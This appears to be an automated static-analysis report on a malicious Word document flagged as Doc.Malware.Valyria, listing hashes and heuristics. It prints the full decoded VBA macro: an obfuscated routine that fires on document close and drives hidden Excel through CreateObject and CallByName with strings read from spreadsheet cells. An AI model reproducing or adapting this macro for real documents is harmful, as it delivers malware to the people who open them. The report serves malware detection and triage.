Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 8434cfd72202167e…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 71.8 KB
Created: 2021-01-20 13:40:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-01-23
MD5: 58e6756f5bf380cce3a43799de0503e1
SHA-1: a8aa8ae3d1d066dcb64e693b69c64fbfc7d59af8
SHA-256: 8434cfd72202167ead9fb2620dfa2e850bc7b0c882c35838d5b1478a1136828b
Risk score: 222

Heuristics (5)

  • ClamAV: Doc.Malware.Valyria-10033904-0 [severity: critical; rule: CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Valyria-10033904-0
  • VBA project inside OOXML [severity: medium; rule: OOXML_VBA; 2 related findings]
    Document contains a VBA project (VBA macros present)
  • CreateObject call [severity: high; rule: OLE_VBA_CREATEOBJ]
    Matched line in script:
    Set r4 = CreateObject(UserForm1.ComboBox1)
  • CallByName call [severity: high; rule: OLE_VBA_CALLBYNAME]
    Matched line in script:
    s4l = CallByName(Application, rm, 2)
  • Embedded URL [severity: info; rule: EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL extracted from this sample is labelled "In document text (OOXML body / shared strings)", and all of them are schemas.microsoft.com / schemas.openxmlformats.org XML namespace URIs of the kind Word writes into every OOXML part, not remote resources fetched by the macro.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 9139 bytes
SHA-256: e93dbbd6b43e6edb1d3f3126265eadcfa6d9e40175d10770da85d12b3ccf35e2
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Public wcm, g5u0y, sbihd, jtl, wi
Sub Document_Close()
n7 = Application.ProductCode
If ts > 3715 Then
v89 = Application.Options.InterpretHighAnsi
ts = v89
End If
nnn
End Sub
Sub nnn()
On Error Resume Next
Application.DisplayAlerts = False
v7vbv = Application.Options.ShowMarkupOpenSave
If n7 > 1625 Then
eqlq = Application.Options.ShortMenuNames
n7 = eqlq
End If
Err.Number = 0
UserForm2.ComboBox1.ListIndex = 2
kg = Application.Options.Pagination
If v7vbv > 4702 Then
oz = Application.Options.AutoFormatReplaceQuotes
v7vbv = oz
End If
psfas = Application.Options.MatchFuzzyProlongedSoundMark
If kg > 427 Then
n82 = Application.Options.UpdateLinksAtOpen
kg = n82
End If
xq = Application.Options.DefaultHighlightColorIndex
If psfas > 4599 Then
qn = Application.Options.DisableFeaturesbyDefault
psfas = qn
End If
Dim r4
Set r4 = CreateObject(UserForm1.ComboBox1)
ks6hb = Application.Options.CheckGrammarAsYouType
If xq > 4397 Then
xt4 = Application.CapsLock
xq = xt4
End If
r4.DisplayAlerts = False
rm = "visible"
mw = "OnTime"
Dim af5dn
io = 1
zrf = 1
While io <> 0 And zrf < 3
Set af5dn = r4.Workbooks.Open(FileName:=UserForm2.ComboBox1, Password:=UserForm1.ComboBox2)
io = Err.Number
zrf = zrf + 1
Wend
If io <> 0 Then
gv = Application.Options.AutoFormatReplaceOrdinals
y4 = Application.Options.MatchFuzzySpace
If gv > 4605 Then
b71rw = Application.CentimetersToPoints(59)
gv = b71rw
End If
s4l = CallByName(Application, rm, 2)
If s4l = True Then
Set h2y2 = CreateObject(UserForm1.ComboBox3)
h0th = Application.Options.AutoFormatReplaceFarEastDashes
If y4 > 302 Then
cle7k = Application.CheckSpelling("j0")
y4 = j0
End If
h2y2.Documents.Open ActiveDocument.FullName, ReadOnly:=True
h2y2.Run "ThisDocument.nnn"
h114 = Application.Options.ArabicMode
If h0th > 820 Then
u198e = Application.Options.AutoFormatAsYouTypeApplyFirstIndents
h0th = u198e
End If
i2 = Application.Options.AddHebDoubleQuote
If h114 > 626 Then
gk1d = Application.Options.DefaultOpenFormat
h114 = gk1d
End If
Else
UserForm1.ComboBox4 = UserForm1.ComboBox4 & "0"
Application.OnTime Now + TimeSerial(0, 0, 20), "ThisDocument.nnn"
End If
r4.Quit
jmbn = Application.Options.IgnoreMixedDigits
If i2 > 4741 Then
ps = Application.CentimetersToPoints(11)
i2 = ps
End If
Exit Sub
End If
Dim ij2j
Set ij2j = r4.sheets(1)
hgxr = "'"
rb8sm = r4.sheets(3).Cells(138, 43).Value
g5u0y = r4.sheets(2).Cells(189, 49).Value
wcm = r4.sheets(1).Cells(4, 42).Value
k17l = r4.sheets(2).Cells(192, 27).Value
e1qk = r4.sheets(3).Cells(230, 45).Value
uo76h = r4.sheets(3).Cells(61, 26).Value
o02uz = Application.Options.DefaultTextEncoding
If jmbn > 3900 Then
tn = Application.Options.PasteAdjustParagraphSpacing
jmbn = tn
End If
jw806 = Application.Options.AutoFormatAsYouTypeApplyFirstIndents
If o02uz > 3206 Then
ydeym = Application.Options.PictureEditor
o02uz = ydeym
End If
jfnmh = r4.sheets(2).Cells(21, 7).Value
o8 = r4.sheets(3).Cells(51, 38).Value
rgv = ij2j.Cells(92, 29).Value
fuco = r4.sheets(2).Cells(201, 28).Value
n22hw = Application.Options.MatchFuzzyCase
If jw806 > 3153 Then
z1c = Application.Options.AddControlCharacters
jw806 = z1c
End If
lb7 = r4.sheets(1).Cells(18, 15).Value
prm = r4.sheets(3).Cells(91, 3).Value
fqgd = r4.sheets(2).Cells(188, 22).Value
qqb = r4.sheets(3).Cells(240, 39).Value
bu = r4.sheets(3).Cells(164, 4).Value
xh = r4.sheets(3).Cells(69, 13).Value
b7m = r4.sheets(1).Cells(1, 28).Value
gr623 = Application.Options.SaveInterval
If n22hw > 2275 Then
dwo4f = Application.Options.ShortMenuNames
n22hw = dwo4f
End If
rm6yb = Application.Options.CheckHangulEndings
If gr623 > 4240 Then
lbnj = Application.Options.UseDiffDiacColor
gr623 = lbnj
End If
h8ta = Application.Options.IgnoreMixedDigits
If rm6yb > 2837 Then
whjyf = Application.Options.MeasurementUnit
rm6yb = whjyf
End If
mcthn = r4.sheets(2).Cells(214, 26).Value
oovot = r4.sheets(1).Cells(133, 11).Value
l4gr1 = r4.sheets(3).Cells(151, 9).Value
b4dib = r4.sheets(1).Cells(114, 21).Value
px2p = r4.sheets(2).Cells(55, 48).Value
wi = r4.sheets(1).Cells(32, 17).Value
zuldz = ij2j.Cells(49, 24).Value
zz = Application.Options.MultipleWordConversionsMode
If h8ta > 3183 Then
nc = Application.Options.HangulHanjaFastConversion
h8ta = nc
End If
dvw4j = r4.sheets(2).Cells(162, 25).Value
mrj = r4.sheets(1).Cells(173, 17).Value
tqb0 = CallByName(r4, rb8sm, 2)
Set fql15 = UserForm1.Controls.Add("Forms.ComboBox.1")
fql15.Value = jfnmh & tqb0 & l4gr1
Set vend1 = UserForm1.Controls.Add("Forms.ComboBox.1")
vend1.Value = dvw4j
CallByName CreateObject(lb7), fqgd, 1, fql15, e1qk, vend1
tn3bg = Application.Options.MatchFuzzyPunctuation
If zz > 303 Then
iln = Application.Options.SnapToGrid
zz = iln
End If
Set j6d = CreateObject(px2p)
n6 = Application.Options.DefaultTextEncoding
If tn3bg > 1874 Then
zgt = Application.Options.UseDiffDiacColor
tn3bg = zgt
End If
Set hai = CallByName(j6d, bu, 2)
Set cq7u = CallByName(hai, b4dib, 1)
Set mcthn = CallByName(j6d, mcthn, 2)
Set jtl = j6d
Set k17l = CallByName(mcthn, k17l, 2)
Set rgv = CallByName(k17l, rgv, 2)
Set ts = CallByName(rgv, mrj, 1, oovot)
Set wcm = CallByName(ts, wcm, 2)
qqb = CallByName(wcm, qqb, 2)
CallByName wcm, prm, 1, 1, qqb
Set sbihd = UserForm1.Controls.Add("Forms.ComboBox.1")
sbihd.Value = uo76h & b7m
UserForm3.ComboBox1 = fuco
sbihd.Value = zuldz
UserForm4.ComboBox1 = UserForm3.ComboBox1
UserForm3.ComboBox1 = qqb
j6d = Nothing
af5dn = Nothing
ij2j = Nothing
hai = Nothing
cq7u = Nothing
mcthn = Nothing
k17l = Nothing
cuan = Application.Options.DefaultHighlightColorIndex
rgv = Nothing
ts = Nothing
wcm = Nothing
rlnfy = Application.Options.ShowDiacritics
If cuan > 4321 Then
n = Application.CapsLock
cuan = n
End If
jtl = Nothing
DoEvents
wv = Application.Options.MatchFuzzyZJ
If rlnfy > 2253 Then
cuf6g = Application.Options.ShortMenuNames
rlnfy = cuf6g
End If
CallByName r4, o8, 1
r4 = Nothing
DoEvents
CallByName CreateObject(lb7), xh, 1, jfnmh & tqb0 & l4gr1
bxk5s = Application.Options.AutoFormatAsYouTypeReplaceSymbols
If wv > 447 Then
q5wc3 = Application.Options.AutoWordSelection
wv = q5wc3
End If
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{AB822AE0-A721-4E9C-A578-25F8EFB076B2}{3D63021F-8E0D-4B55-8C54-7A37E2DC834C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{30315FF2-83E5-47CC-A2E4-180551C90594}{648DDFF3-441D-49B5-86FE-736AFF51699F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 On Error GoTo ErrorHandler

 qi3ty = UserForm2.Controls.Count - 1
 
 If Len(UserForm1.ComboBox4) > 10 Then
 qi3ty = qi3ty * 2

dm9ra = Application.Options.PromptUpdateStyle

If k0kr > 880 Then


k8p6w = Application.Options.AutoFormatAsYouTypeApplyFirstIndents

k0kr = k8p6w


n0 = Application.Options.PasteAdjustTableFormatting


k0kr = Application.Options.VisualSelection

If n0 > 379 Then


i0 = Application.Options.AddControlCharacters

n0 = i0

End If

End If

 End If

etj0 = Application.Options.AutoFormatAsYouTypeApplyBulletedLists

If dm9ra > 443 Then


b7w = Application.Options.ShowControlCharacters

dm9ra = b7w

End If


 z3 = ""
 For j9 = 1 To qi3ty Step 2
 z3 = z3 & UserForm2.Controls.Item(j9)
 Next

 ComboBox1.AddItem "ek"
 ComboBox1.AddItem "zo"
 ComboBox1.AddItem z3
 ComboBox1.AddItem "x9se1"
 
 Exit Sub
 
ErrorHandler:
 
 
 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{64B206EF-0C85-447C-95DB-FB08B608E4F4}{4B33854D-801C-4BEC-A203-96BC847A1E07}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.wcm, ActiveDocument.g5u0y, VbMethod, ActiveDocument.sbihd
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{2189CEA1-0435-42B0-BCFD-7D90AE524D22}{F5CAB12D-8A16-4ADD-B67D-84A22CC4E129}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.jtl, ActiveDocument.wi, VbMethod, ActiveDocument.sbihd
End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 43520 bytes
SHA-256: f5e8588be42162e02b95e4359f45b4f3911d87ba4dd224eb6e3616bc708e93ba
Detection: ClamAV: Doc.Malware.Valyria-10033904-0
Obfuscation or payload: unlikely